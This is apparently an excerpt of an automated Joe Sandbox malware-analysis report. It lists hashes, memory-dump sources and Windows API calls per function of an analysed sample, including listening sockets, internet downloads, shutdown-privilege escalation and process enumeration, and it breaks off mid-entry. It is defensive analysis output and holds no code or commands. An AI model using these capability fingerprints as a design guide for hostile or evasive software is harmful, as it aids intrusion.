                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                      • String ID: *.*
                                                      • API String ID: 713712311-438819550
                                                      • Opcode ID: 129070a14bed1b889613a626ad3c1a5579dfaf5039321daa096a75cf352feba5
                                                      • Instruction ID: 6f111bf4aca8ec481fceaa5c180d50292d711ef41f33f78643ab0d31af9fdca3
                                                      • Opcode Fuzzy Hash: 129070a14bed1b889613a626ad3c1a5579dfaf5039321daa096a75cf352feba5
                                                      • Instruction Fuzzy Hash: F141817190025AAFCF18DF64DC49AEEBBBAFF15310F104466E815A3291EB309E55CF90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: __itow__swprintf
                                                      • String ID: 3c_$__
                                                      • API String ID: 674341424-43384800
                                                      • Opcode ID: 2cbe2598938203af56cd7082d87fcc46f775b394ac10575c35360b177b7ff1b7
                                                      • Instruction ID: d089231c42d24155e9bde96e1967eda67dcd8d4401d442238fc08a6baa495a6e
                                                      • Opcode Fuzzy Hash: 2cbe2598938203af56cd7082d87fcc46f775b394ac10575c35360b177b7ff1b7
                                                      • Instruction Fuzzy Hash: 2922BC716083459FDB24DF14C885BAFBBE5BF84310F00492DFA9A97291DB35E904CB92
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: e6028624b674af9cdcb4851b8b3e7a6baa7a8c053d016b14fd2bcadee713e6f7
                                                      • Instruction ID: ce01f73b21ec4cb1084cf8b9ccee77cc55a5820cb6eb31d47c6f0d4cd1040068
                                                      • Opcode Fuzzy Hash: e6028624b674af9cdcb4851b8b3e7a6baa7a8c053d016b14fd2bcadee713e6f7
                                                      • Instruction Fuzzy Hash: BE12AD70A00609DFDF08DFA5D995AEEBBF6FF48300F104529E546E7290EB39A915CB50
                                                      APIs
                                                        • Part of subcall function 006387E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0063882B
                                                        • Part of subcall function 006387E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00638858
                                                        • Part of subcall function 006387E1: GetLastError.KERNEL32 ref: 00638865
                                                      • ExitWindowsEx.USER32(?,00000000), ref: 006451F9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                      • String ID: $@$SeShutdownPrivilege
                                                      • API String ID: 2234035333-194228
                                                      • Opcode ID: 1cbb99ea929e93ff9d78a185ddca76e7bd6f1e0a823eeb295600fd4c05382217
                                                      • Instruction ID: 95887288be31cf8f91fa2e6bda3c2c28ab7f43a84175cc8664e28b1e9a215a59
                                                      • Opcode Fuzzy Hash: 1cbb99ea929e93ff9d78a185ddca76e7bd6f1e0a823eeb295600fd4c05382217
                                                      • Instruction Fuzzy Hash: 1601F2316A16116BEB2867B8AC9AFFB725AEB05740F200426F913E26D3DAD15E0185A4
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 006562DC
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 006562EB
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00656307
                                                      • listen.WSOCK32(00000000,00000005), ref: 00656316
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00656330
                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00656344
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                      • String ID:
                                                      • API String ID: 1279440585-0
                                                      • Opcode ID: e7d18239099f7850b3baed6c9277b185604c51ecfeb07597839b0c3a3a1b70ef
                                                      • Instruction ID: 2a1b32580b08cb120925c6e69daf2fd563abfbf81bcd1b73bda8f7fd916b5ccf
                                                      • Opcode Fuzzy Hash: e7d18239099f7850b3baed6c9277b185604c51ecfeb07597839b0c3a3a1b70ef
                                                      • Instruction Fuzzy Hash: 9621D2316002009FCB00EF64DC49A6EBBBAFF84321F548168FC56A7391CBB0AD05CB91
                                                      APIs
                                                        • Part of subcall function 00600DB6: std::exception::exception.LIBCMT ref: 00600DEC
                                                        • Part of subcall function 00600DB6: __CxxThrowException@8.LIBCMT ref: 00600E01
                                                      • _memmove.LIBCMT ref: 00630258
                                                      • _memmove.LIBCMT ref: 0063036D
                                                      • _memmove.LIBCMT ref: 00630414
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 1300846289-0
                                                      • Opcode ID: dab2d30d2ca3a8f4d6429a5114c671266f8ea1b14987b53238d44fd725e5ed3c
                                                      • Instruction ID: 5a4a88a4b47563fe76fe83029fccbf1e305b993ad992d84d0f0d86c2baee3844
                                                      • Opcode Fuzzy Hash: dab2d30d2ca3a8f4d6429a5114c671266f8ea1b14987b53238d44fd725e5ed3c
                                                      • Instruction Fuzzy Hash: 3602CF70A00209DBDF08DF64D995ABEBBF6FF44300F148069E90ADB295EB34DA54CB95
                                                      APIs
                                                        • Part of subcall function 005E2612: GetWindowLongW.USER32(?,000000EB), ref: 005E2623
                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 005E19FA
                                                      • GetSysColor.USER32(0000000F), ref: 005E1A4E
                                                      • SetBkColor.GDI32(?,00000000), ref: 005E1A61
                                                        • Part of subcall function 005E1290: DefDlgProcW.USER32(?,00000020,?), ref: 005E12D8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ColorProc$LongWindow
                                                      • String ID:
                                                      • API String ID: 3744519093-0
                                                      • Opcode ID: 9de142b673a7e45f653b96eda03a802fed43b394a9cd013f5ad0b4d52152b98b
                                                      • Instruction ID: 717a8680346cf6e9cbdb91bae1fdfa8d28bf63eea126ade0194d8372378ae77c
                                                      • Opcode Fuzzy Hash: 9de142b673a7e45f653b96eda03a802fed43b394a9cd013f5ad0b4d52152b98b
                                                      • Instruction Fuzzy Hash: 5CA10471102DD4BAD72CAE3A8C48DFF2E5FFB42341B181929F582D5292CA349D4196FE
                                                      APIs
                                                        • Part of subcall function 00657D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00657DB6
                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0065679E
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 006567C7
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00656800
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0065680D
                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00656821
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 99427753-0
                                                      • Opcode ID: 52fe9be1c67f6cca37a8c151c3c20b5fe11b6de50748add1b778c2322fdb1982
                                                      • Instruction ID: 11eb3906207c9f672441f369bdccedc1c75ead75695976fb3f9e331611700cc9
                                                      • Opcode Fuzzy Hash: 52fe9be1c67f6cca37a8c151c3c20b5fe11b6de50748add1b778c2322fdb1982
                                                      • Instruction Fuzzy Hash: E741E6756002046FDB54AF25DC8AF7E7BA9EF88714F44846CF999AB3D2CA709D008791
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                      • String ID:
                                                      • API String ID: 292994002-0
                                                      • Opcode ID: e17d1183bf1bced646c6f4d6174bbdc4c0713809d66184a8848372f27d78a32d
                                                      • Instruction ID: bbbd474b5d5386af80bc243316eb0cae9c44cab1cd84b8b57d55846f71203175
                                                      • Opcode Fuzzy Hash: e17d1183bf1bced646c6f4d6174bbdc4c0713809d66184a8848372f27d78a32d
                                                      • Instruction Fuzzy Hash: 5811B2713009116BEB216F26EC49A6B7B9AFF94BA1F404029F847E7351DBB09C0186A5
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006380C0
                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006380CA
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006380D9
                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006380E0
                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006380F6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: 790fae2f946daf712fdd7cce1d41972a8f4bfd3c32289d273aea2077fe7c4489
                                                      • Instruction ID: 1f453e7bdbe536cb92843d9b2786aa3b6c9686dc2109504d2013784b7c9d2c97
                                                      • Opcode Fuzzy Hash: 790fae2f946daf712fdd7cce1d41972a8f4bfd3c32289d273aea2077fe7c4489
                                                      • Instruction Fuzzy Hash: FFF06271244305AFEB100FA5EC8DEE73BAEFF8A795F001025F945C7250CBA19C51DAA0
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,005E4AD0), ref: 005E4B45
                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 005E4B57
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                      • API String ID: 2574300362-192647395
                                                      • Opcode ID: 469b8bb417d89a05643369045cd8d466d8f6d63db02e260aafe07ee2ac19037a
                                                      • Instruction ID: 0ad19047781cc579f157ae13c89ceeee2ec7ab0ce36e74783e4e4b7347c641e7
                                                      • Opcode Fuzzy Hash: 469b8bb417d89a05643369045cd8d466d8f6d63db02e260aafe07ee2ac19037a
                                                      • Instruction Fuzzy Hash: 59D01234A10713CFDB209F32F818B06B6D9BF05391B119879D4C5D6150D6B0D480CA54
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0065EE3D
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0065EE4B
                                                        • Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0065EF0B
                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0065EF1A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                      • String ID:
                                                      • API String ID: 2576544623-0
                                                      • Opcode ID: 79f0f493d671cf392cd6fcb8aef1ba7055a2f4274fe41cf4497020754cb7ffe0
                                                      • Instruction ID: 820cef84b24e4b903e5344499b15ca15fe9f28b2589282f53ba2c946a8c2bc50
                                                      • Opcode Fuzzy Hash: 79f0f493d671cf392cd6fcb8aef1ba7055a2f4274fe41cf4497020754cb7ffe0
                                                      • Instruction Fuzzy Hash: D3518E715083459FD714EF25DC85EABBBE8FF98710F00482DF995972A1EB70A908CB92
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0063E628
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: lstrlen
                                                      • String ID: ($|
                                                      • API String ID: 1659193697-1631851259
                                                      • Opcode ID: 220cc91ef110e8dd80d9dbe7f755183844159b9ee678c5212ce3edad513d8744
                                                      • Instruction ID: ce54c67ea317979a0111861cae63a2277dffa6ccf5cb628a01a8bf7458d8f2d9
                                                      • Opcode Fuzzy Hash: 220cc91ef110e8dd80d9dbe7f755183844159b9ee678c5212ce3edad513d8744
                                                      • Instruction Fuzzy Hash: 1D321575A006059FDB28CF19C481AAAB7F1FF48310F15C46EE89ADB3A1D771E941CB94
                                                      APIs
                                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0065180A,00000000), ref: 006523E1
                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00652418
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                      • String ID:
                                                      • API String ID: 599397726-0
                                                      • Opcode ID: 84209d3cf70603e6d8c216ea83e9d70cfedd0aac88c227061cad9d1078be1990
                                                      • Instruction ID: e7a67aa7e183e17bba469098604e33b535ca7e3a54a7f32461cd3620b96b02d9
                                                      • Opcode Fuzzy Hash: 84209d3cf70603e6d8c216ea83e9d70cfedd0aac88c227061cad9d1078be1990
                                                      • Instruction Fuzzy Hash: 6D41F67190420ABFEB10DE95DC91FFB77EEEB41316F10402EFE01A6280DA749E499664
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0064B343
                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0064B39D
                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0064B3EA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DiskFreeSpace
                                                      • String ID:
                                                      • API String ID: 1682464887-0
                                                      • Opcode ID: d0ef04da0b29037b9dd4d007429b77835c8e0bbd430ec306e1027d8cd1217afe
                                                      • Instruction ID: 8c2d745c8b7e76628b8ff09dad0c89f865e825ea7a8bcab451b45494004cb1eb
                                                      • Opcode Fuzzy Hash: d0ef04da0b29037b9dd4d007429b77835c8e0bbd430ec306e1027d8cd1217afe
                                                      • Instruction Fuzzy Hash: 40219035A00118EFCB00EFA5D884AEDFBB9FF49314F0480A9E845AB361CB319915CB51
                                                      APIs
                                                        • Part of subcall function 00600DB6: std::exception::exception.LIBCMT ref: 00600DEC
                                                        • Part of subcall function 00600DB6: __CxxThrowException@8.LIBCMT ref: 00600E01
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0063882B
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00638858
                                                      • GetLastError.KERNEL32 ref: 00638865
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                      • String ID:
                                                      • API String ID: 1922334811-0
                                                      • Opcode ID: 6496aa269abaf7d9dd1bb24a1d77c72baba7728d1826e3f98337262ce4f0dd07
                                                      • Instruction ID: 116aba6a914c6b0c173ae670a6423f00973532ced0c92af3f6f5f81bcd95abda
                                                      • Opcode Fuzzy Hash: 6496aa269abaf7d9dd1bb24a1d77c72baba7728d1826e3f98337262ce4f0dd07
                                                      • Instruction Fuzzy Hash: F8118FB2414305AFE718DFA4EC85D6BB7FEEB44710B20852EF45697241EB70BC418B60
                                                      APIs
                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00638774
                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0063878B
                                                      • FreeSid.ADVAPI32(?), ref: 0063879B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                      • String ID:
                                                      • API String ID: 3429775523-0
                                                      • Opcode ID: 5be4eaf3bbe6f0dea27eee48431ff449dc699e9b7015aa691111fe28b5da3d32
                                                      • Instruction ID: 46f5975905187235b88ffae78fa265689f0eeee3cd4ef5acaee0b71cab92bf87
                                                      • Opcode Fuzzy Hash: 5be4eaf3bbe6f0dea27eee48431ff449dc699e9b7015aa691111fe28b5da3d32
                                                      • Instruction Fuzzy Hash: F4F04975A1130CBFDF00DFF4DD99AAEBBBDEF08201F1044A9E901E2281E6756A448B50
                                                      APIs
                                                      • __time64.LIBCMT ref: 0064889B
                                                        • Part of subcall function 0060520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00648F6E,00000000,?,?,?,?,0064911F,00000000,?), ref: 00605213
                                                        • Part of subcall function 0060520A: __aulldiv.LIBCMT ref: 00605233
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
